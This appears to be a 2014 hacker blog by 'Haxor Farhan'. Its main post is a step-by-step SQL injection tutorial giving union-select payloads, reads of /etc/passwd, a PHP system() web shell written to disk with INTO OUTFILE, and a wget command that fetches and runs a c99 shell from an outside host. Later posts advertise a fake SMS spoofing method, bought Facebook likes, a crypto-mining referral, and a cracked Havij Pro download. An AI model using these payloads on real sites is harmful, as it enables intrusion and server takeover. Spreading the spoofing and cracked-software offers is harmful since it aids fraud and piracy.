Thursday, 6 November 2014

Posted by Haxor On 02:21

Salam From  HaXor Farhan ( MR-Crack )& (Muslim Shadow)




First of all find a website which is vulnerable to sql injection. You can find websites by dorks or manually like i have found this.
You need 2 main things:
  1. Root Path of the website 
  2. A Writable Directory 
Most of the time, you will see root path in SQL error of that site.Like the following one.

Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean given in /home/aeiti/public_html/admin/requires/functions.php on line 1327
 Well If the vulnerable website doesn't show the root path then don't worry i will show you how to know the root path. And Also Writable Directory.
www.site.com/index.php?id=10'
I am not starting with abc of SQLI I hope u know the basics.
Now we have to found columns of the website then vulnerable columns like my site have 5 columns And 3 is the vulnerable column
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,3,4,5--
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,version(),4,5--
Let's Try To Load Files Of The Website
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/passwd'),4,5--
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/my.cnf'),4,5--
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/group'),4,5--
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/services'),4,5--
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/hosts'),4,5--
We Won't Need To Read Any Files Mentioned above just to increase your knowledge. Now we have to check the file privileges for the current user for this first you have to find current username.
Like This
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,current_user,4,5--
Our Current Username is etc mine is Ch3rn0by1
Now Check File Privilages for User Ch3rn0by1
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,file_priv,4,5 FROM mysql.user WHERE user='Ch3rn0by1'--
If it shows Y (yes) on the vulnerable column of the website that means we have the file privileges for the current user Ch3rn0by1
And if it doesn't show Y then Don't waste your time there :D

Ok Now we need to know the root path for this webserver. So, for this information we need to know the webserver type.For this you can use firefox adon server spy.
Server Spy Adon: https://addons.mozilla.org/en-us/firefox/addon/server-spy/
You can use havij and some other tool too to detect webserver type.
To know the webserver by file /etc/passwd use this query
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,3,load_file('/etc/passwd'),5--
now we have our webserver etc (/home/Ch3rn0by1)
now read one more file.
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('etc/Ch3rn0by1.conf')4,5--
Where Ch3rn0by1 is your webserver software name like server name.conf .

now we have the root path
/home/site.com/public_html etc.
Now we have to find a writeable directory for this you can use google dorks as well and your knowledge too :D
site www.site.com/dir/*/*/*/*/
so its site.com/ch3rn0by1/writeable

now we will upload our evil code
www.site.com/index.php?id=10 UniOn SeleCt 1,2,"<?system($_REQUEST['cmd']);?>",4,5 into outfile '/home/site/public_html/Ch3rn0by1/writeable directory/Ch3rn0by1.php'--+
ok now we have to execute our commands
www.site.com/Ch3rn0by1/writeable directory/Ch3rn0by1.php?cmd=pwd
www.site.com/Ch3rn0by1/writeable directory/Ch3rn0by1.php?cmd=uname -a
Now we will use wget command to upload our evil script
www.site.com/Ch3rn0by1/writeable directory/Ch3rn0by1.php?cmd=wget http://www.shellsite.com/c99.txt
Now we will rename our c99.txt to php in order to execute it :D
www.site.com/Ch3rn0by1/writeable directory/Ch3rn0by1.php?cmd=mv c99.txt c99.php
now open it
www.site.com/Ch3rn0by1/writeable directory/c99.php VOILA OUR SHELL GOT LIVE :D

Saturday, 11 October 2014

Posted by Haxor On 14:08

EARN BTC / DOGE / PAYPAL DOLLARS [FREE]


Introducing you with a new mining site.


Why use Cointellect?
Cointellect offer free Dogecoin mining also their service allow users to purchase hashing power and enable miners to contribute to a pool.
Besides thats you have 10% affiliate commission even your ref. is just free miner.
  




    How to get started ?
 1- Go and create an account here : http://cointellect.com/?code=b5a331c4
2- Confirm your account via "Activation Email" ...
3- Now Download software from there, Install and then run it in your PC / RDP...



Personally telling you that I am running this software in my many RDPs.. So earning many euros from it. :D





 Earning Proof:
























Exchange Dogecoin to Bitcoin: 
1- You can use exchangers site to convert your Dogecoins to Bitcoins Simply.
For example this site: https://bter.com/


Some tips for earn more with Cointellect:
1-  End task unnecessary programs that run background.
2- Don't forget to use invitation code so you can get your first coin soon.


Thanks! I hope you Enjoyed it... :) 

Sunday, 7 September 2014

Posted by Unknown On 06:24

  • I will Tell You the Method How To Send Fake Sms...
  • You can send sms All Over the World.
  • you can send Unlimited msg.
  • The Best Thing Is (You can send Sms From Any Name Or Number)
  • So What R u Wating For??


Order Now...


Thursday, 21 August 2014

Posted by Unknown On 22:47
            
 HElloo... :)
Today I am share a trick to How To Get Free Facebook Likes.Photo,,Status,,Page Liker And Auto Commnter.. Here you don’t need any technical knowledge....Go to this Link.

                                                                       http://www.fiverr.com/mrhamxa
                    
Posted by Unknown On 22:26
HElloo... :)
Today I am share a trick to make a nameless Facebook profile name. Here you don’t need any technical knowledge...Go this Link And Buy This Method/.......

         

           http://www.fiverr.com/mrhamxa

Wednesday, 23 July 2014

Posted by Haxor On 02:57
Salam From Haxor Farhan

This method is not in any way related to increasing your signals. Its a simple trick to make your internet browsing faster
i was really depressed About my internet Connection Speed  i am Using Doctor Evo
Basically in this tutorials I am using Google Dns 

To set it up on evo, you need to follow as below:

  1. Go to network settings
  2. Check the box that says Use DNS
  3. enter DNS: 8.8.8.8
  4. enter Alternate DNS: 8.8.4.4
  5. Apply the changes and close.
Regards λαςκεξ  
>>>>Fb>>>>>
 https://www.facebook.com/pakhackersteam



Sunday, 4 May 2014

Posted by Haxor On 10:20
Havij Pro Full Download
                                    
                                   ♥♥♥ (¯`’•.¸(¯`’•.¸*Farhan Rg*¸.•’´¯)¸.• ‘´¯)♥♥♥  

Salam From (Haxor Farhan) {Mirza MUzaffar} |Mr-Crack|

               Havij Pro website Ko SQL Ky zAriya Hack Karta Hy  . .Kuch Log Online website Ko Hack Karny K Liye SQL Method Use Karty  .mtlb Adress Bar ya Hack Bar sY. LiKin Ya One Of The Best Tool Hy Newbies Ky Liye 

Ya kuch Screen Shoots Han Havij Ko Regstrd. Karny Ky

Name: Cracked@By.Exidous


Key: hAVIJ Pro K Folder Ky Andar Key Majood Hy wahan Sy select Karain :)






































 Done ! EnjoY :)